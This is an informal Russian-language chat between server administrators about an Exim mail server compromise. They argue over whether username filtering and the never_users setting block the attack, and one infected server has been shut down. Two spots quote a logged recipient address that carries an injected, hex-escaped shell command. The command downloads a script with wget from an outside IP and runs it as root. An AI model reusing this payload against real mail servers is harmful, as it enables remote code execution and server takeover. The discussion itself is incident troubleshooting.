SUID bit set on it by
default

надо глянуть на зараженном

ДА, из коробки, но не в этом дело. та команда в логе - это юзернейм. Ты же на 110% не хостишь юзера с таким именем, тем более, что часть символов, использованых там успешно отсекается регулярками. А значит проверка юзернейма не пустит его дальше

попробуй юзера bin

А never_users просто не дает использовать root в качестве юзернейма типа root@servername

попробуй

2019-06-10 05:21:13 H=(server.***.ru) [89.248.171.57] F=<> rejected RCPT <bin+${run{\x2fbin\x2fbash\x20\x2dc\x20\x22wget\x20\x2d\x2dno\x2dcheck\x2dcertificate\x20\x2dt\x203\x20\x2dT\x2075\x20http\x3a\x2f\x2f185\x2e162\x2e235\x2e211\x2fldmxim\x20\x2dO\x20\x2froot\x2f\x2eyimrv\x20\x26\x26\x20sh\x20\x2froot\x2f\x2eyimrv\x20\x2dn\x22\x20\x26}}@server.***.ru>: relay not permitted

только с верным доменом

поздно

уже 4.92)

поидее юзер bin не содержится в спске never_users и с верным доменом тебя бы тоже хакнули

причем здесь системные юзеры?

подумай

взаимно

rce в модуле доставки письма

если пользователь есть в системе

как например bin

то оно попытается доставить

и привет

bin+${run{\x2fbin\x2fbash\x20\x2dc\x20\x22wget\x20\x2d\x2dno\x2dcheck\x2dcertificate\x20\x2dt\x203\x20\x2dT\x2075\x20http\x3a\x2f\x2f185\x2e162\x2e235\x2e211\x2fldmxim\x20\x2dO\x20\x2froot\x2f\x2eyimrv\x20\x26\x26\x20sh\x20\x2froot\x2f\x2eyimrv\x20\x2dn\x22\x20\x26}} это local_part. До того как доставить правильно настроенный exim должен проверить его наличие в системе. А перед этим мой сервер разбирает его на предмет наличия нехороших символов. И если они есть - письмо идет лесом

да просто проверь:)

Саппорт уже вырубил сервак зараженный:(
У меня тоже есть проверька на нехорошие символы, она с коробки, надо там глянкть, думаю, что тоже была.